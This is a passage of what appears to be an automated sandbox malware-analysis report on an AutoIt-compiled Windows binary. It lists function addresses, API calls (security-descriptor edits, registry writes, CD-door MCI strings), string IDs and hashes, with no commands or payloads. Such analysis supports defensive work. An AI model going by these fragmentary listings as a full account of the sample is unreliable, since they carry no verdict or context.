                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                                                                                  • String ID: AutoIt v3 GUI
                                                                                                                                                                                                                                  • API String ID: 1458621304-248962490
                                                                                                                                                                                                                                  • Opcode ID: 4aef746d3146be3e005b5b58a738f7bf137d10e92c9005c97f6b5b5982be598f
                                                                                                                                                                                                                                  • Instruction ID: 45da345f19a3b3c33f683308ef24ba05e112a96fcf3ce61c02b9615d93e92ea4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4aef746d3146be3e005b5b58a738f7bf137d10e92c9005c97f6b5b5982be598f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7EB16A31A40209AFDF14DFACCC55BAE7BB4FB88315F10822AFA15A7290D774E942CB51
                                                                                                                                                                                                                                  Function 009F16D7 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 009F1A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 009F1A60
                                                                                                                                                                                                                                    • Part of subcall function 009F1A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,009F14E7,?,?,?), ref: 009F1A6C
                                                                                                                                                                                                                                    • Part of subcall function 009F1A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,009F14E7,?,?,?), ref: 009F1A7B
                                                                                                                                                                                                                                    • Part of subcall function 009F1A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,009F14E7,?,?,?), ref: 009F1A82
                                                                                                                                                                                                                                    • Part of subcall function 009F1A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 009F1A99
                                                                                                                                                                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 009F1741
                                                                                                                                                                                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 009F1775
                                                                                                                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 009F178C
                                                                                                                                                                                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 009F17C6
                                                                                                                                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 009F17E2
                                                                                                                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 009F17F9
                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000008), ref: 009F1801
                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 009F1808
                                                                                                                                                                                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 009F1829
                                                                                                                                                                                                                                  • CopySid.ADVAPI32(00000000), ref: 009F1830
                                                                                                                                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 009F185F
                                                                                                                                                                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 009F1881
                                                                                                                                                                                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 009F1893
                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009F18BA
                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 009F18C1
                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009F18CA
                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 009F18D1
                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009F18DA
                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 009F18E1
                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 009F18ED
                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 009F18F4
                                                                                                                                                                                                                                    • Part of subcall function 009F1ADF: GetProcessHeap.KERNEL32(00000008,009F14FD,?,00000000,?,009F14FD,?), ref: 009F1AED
                                                                                                                                                                                                                                    • Part of subcall function 009F1ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,009F14FD,?), ref: 009F1AF4
                                                                                                                                                                                                                                    • Part of subcall function 009F1ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,009F14FD,?), ref: 009F1B03
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4175595110-0
                                                                                                                                                                                                                                  • Opcode ID: d7287bb6bc47a43c98665e4a907c6e3b1e6a1de697b4187497f5afb99e0e92f2
                                                                                                                                                                                                                                  • Instruction ID: 4b39cf035d74fe6ff05fa494ed4158ec9ad52f5d4e6d1b1276404e1a1bee2898
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d7287bb6bc47a43c98665e4a907c6e3b1e6a1de697b4187497f5afb99e0e92f2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 67714AB2D00209FBEB20DFE5DD45FBEBBBCAF44750F144125EA15A61A1D7319A06CBA0
                                                                                                                                                                                                                                  Function 00A1CE17 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A1CF1D
                                                                                                                                                                                                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,00A2DCD0,00000000,?,00000000,?,?), ref: 00A1CFA4
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00A1D004
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A1D054
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A1D0CF
                                                                                                                                                                                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00A1D112
                                                                                                                                                                                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00A1D221
                                                                                                                                                                                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00A1D2AD
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00A1D2E1
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00A1D2EE
                                                                                                                                                                                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00A1D3C0
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                                                                                                                                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                                                                                  • API String ID: 9721498-966354055
                                                                                                                                                                                                                                  • Opcode ID: cc8408a014811644f5260a8c4dba25dd61e4b9b43a255abc2f6b8b76b154d7c1
                                                                                                                                                                                                                                  • Instruction ID: e3c99e7f1bb024b1d314ea1482a4fa8cc4aa8771474780f1d28da90a89480281
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cc8408a014811644f5260a8c4dba25dd61e4b9b43a255abc2f6b8b76b154d7c1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AB125B35604201AFDB14DF58C895B6AB7E5FF88724F14885CF85A9B3A2CB35ED42CB81
                                                                                                                                                                                                                                  Function 00A213BA Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CharUpperBuffW.USER32(?,?), ref: 00A21462
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A2149D
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00A214F0
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A21526
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A215A2
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A2161D
                                                                                                                                                                                                                                    • Part of subcall function 009AFD52: _wcslen.LIBCMT ref: 009AFD5D
                                                                                                                                                                                                                                    • Part of subcall function 009F3535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 009F3547
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                  • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                                                                                                  • API String ID: 1103490817-4258414348
                                                                                                                                                                                                                                  • Opcode ID: 06a4a8db05fd808eb4040363cc03ee54c63ccb8e0ed70c39f8c6d3a3f0bfb620
                                                                                                                                                                                                                                  • Instruction ID: b16ca0b7e92dd43e3724c31713f0a44613f541aae38e3ab7a05aacb08da4d06a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 06a4a8db05fd808eb4040363cc03ee54c63ccb8e0ed70c39f8c6d3a3f0bfb620
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B4E19E716083118FCB14EF28D55096AB7E2FFE4314B1489ACF8969B3A2DB35ED45CB81
                                                                                                                                                                                                                                  Function 00A1D3F8 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                  • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                                                                                                  • API String ID: 1256254125-909552448
                                                                                                                                                                                                                                  • Opcode ID: ca2fa45ec0a8ff3f87176647835f7b77da790810a2292a20ddf314c35676a4f7
                                                                                                                                                                                                                                  • Instruction ID: d86eed74b1a0b8e7400873a835df5ede1415113bc9619ea4e18278d864c8e032
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ca2fa45ec0a8ff3f87176647835f7b77da790810a2292a20ddf314c35676a4f7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C87109326105268BCB109F7CCE506FB37A6AFA5764B210524FC66AB294EB35DDC5C3A0
                                                                                                                                                                                                                                  Function 00A28D97 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A28DB5
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A28DC9
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A28DEC
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A28E0F
                                                                                                                                                                                                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00A28E4D
                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00A26691), ref: 00A28EA9
                                                                                                                                                                                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00A28EE2
                                                                                                                                                                                                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00A28F25
                                                                                                                                                                                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00A28F5C
                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 00A28F68
                                                                                                                                                                                                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00A28F78
                                                                                                                                                                                                                                  • DestroyIcon.USER32(?,?,?,?,?,00A26691), ref: 00A28F87
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00A28FA4
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00A28FB0
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                                                                                                                                  • String ID: .dll$.exe$.icl
                                                                                                                                                                                                                                  • API String ID: 799131459-1154884017
                                                                                                                                                                                                                                  • Opcode ID: efa2aa3200b1970f20e2131d73e46854eb1b9e581a4aee8ce7e521b0222b0bc0
                                                                                                                                                                                                                                  • Instruction ID: 35470489539bb07dd3273da2032c0ae7c56f41dcc0557f91496b5f1c3f44fef8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: efa2aa3200b1970f20e2131d73e46854eb1b9e581a4aee8ce7e521b0222b0bc0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8C61F171900224BEEB24DF68DD45BFE77A8BF08B20F104526F815E60D2DB78E941CBA0
                                                                                                                                                                                                                                  Function 00A048BE Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CharLowerBuffW.USER32(?,?), ref: 00A0493D
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A04948
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A0499F
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A049DD
                                                                                                                                                                                                                                  • GetDriveTypeW.KERNEL32(?), ref: 00A04A1B
                                                                                                                                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A04A63
                                                                                                                                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A04A9E
                                                                                                                                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A04ACC
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                  • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                                                                                  • API String ID: 1839972693-4113822522
                                                                                                                                                                                                                                  • Opcode ID: 80a36f74cb7cc6e6b78b6bf9a644effa3b099e815e821a3896139929259626f0
                                                                                                                                                                                                                                  • Instruction ID: 009749a4c4f142b63fcaf980641f5761971089b2bc2e61b2baaee1146aca214a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 80a36f74cb7cc6e6b78b6bf9a644effa3b099e815e821a3896139929259626f0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6971F4B26082059FC710EF28E84096FB7E4FF98794F10492DF996972A1EB31DD49CB91
                                                                                                                                                                                                                                  Function 009F6382 Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • LoadIconW.USER32(00000063), ref: 009F6395
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 009F63A7
                                                                                                                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 009F63BE
                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 009F63D3
                                                                                                                                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 009F63D9
                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 009F63E9
                                                                                                                                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 009F63EF
                                                                                                                                                                                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 009F6410
                                                                                                                                                                                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 009F642A
                                                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 009F6433
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 009F649A
                                                                                                                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 009F64D6
                                                                                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 009F64DC
                                                                                                                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 009F64E3
                                                                                                                                                                                                                                  • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 009F653A
                                                                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 009F6547
                                                                                                                                                                                                                                  • PostMessageW.USER32(?,00000005,00000000,?), ref: 009F656C
                                                                                                                                                                                                                                  • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 009F6596
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 895679908-0
                                                                                                                                                                                                                                  • Opcode ID: a80c886d87f53cc1d30fe55eee848cb8dc764398bbd3e46f7325b17fef798389
                                                                                                                                                                                                                                  • Instruction ID: 8d9e0acf6ecaaf23f64be996b20b48742739c2be8b33836c6e1281d4054bb91d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a80c886d87f53cc1d30fe55eee848cb8dc764398bbd3e46f7325b17fef798389
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B0716031900709AFDB20DFA8CE45BBEBBF9FF48704F104928E686A25A1D775E945CB50
                                                                                                                                                                                                                                  Function 00A1086B Relevance: 27.1, APIs: 18, Instructions: 128COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F89), ref: 00A10884
                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F8A), ref: 00A1088F
                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00A1089A
                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F03), ref: 00A108A5
                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F8B), ref: 00A108B0
                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F01), ref: 00A108BB
                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F81), ref: 00A108C6
                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F88), ref: 00A108D1
                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F80), ref: 00A108DC
                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F86), ref: 00A108E7
                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F83), ref: 00A108F2
                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F85), ref: 00A108FD
                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F82), ref: 00A10908
                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F84), ref: 00A10913
                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F04), ref: 00A1091E
                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 00A10929
                                                                                                                                                                                                                                  • GetCursorInfo.USER32(?), ref: 00A10939
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00A1097B
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3215588206-0
                                                                                                                                                                                                                                  • Opcode ID: 6a12742c8929868cc2cc69cd921c0fdc40a8885cd8efda8244c24a38d5d58782
                                                                                                                                                                                                                                  • Instruction ID: 0b44be3b0f89a18882d3fe373df406f93acad1e963335a6d0dd5faa111ed3c00
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6a12742c8929868cc2cc69cd921c0fdc40a8885cd8efda8244c24a38d5d58782
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D94154B0D083196ADB10DFBA8C89C6EBFE8FF44754B50452AE15CEB281DA789841CF91
                                                                                                                                                                                                                                  Function 009B0436 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 009B0436
                                                                                                                                                                                                                                    • Part of subcall function 009B045D: InitializeCriticalSectionAndSpinCount.KERNEL32(00A6170C,00000FA0,60C2A4BD,?,?,?,?,009D2733,000000FF), ref: 009B048C
                                                                                                                                                                                                                                    • Part of subcall function 009B045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,009D2733,000000FF), ref: 009B0497
                                                                                                                                                                                                                                    • Part of subcall function 009B045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,009D2733,000000FF), ref: 009B04A8
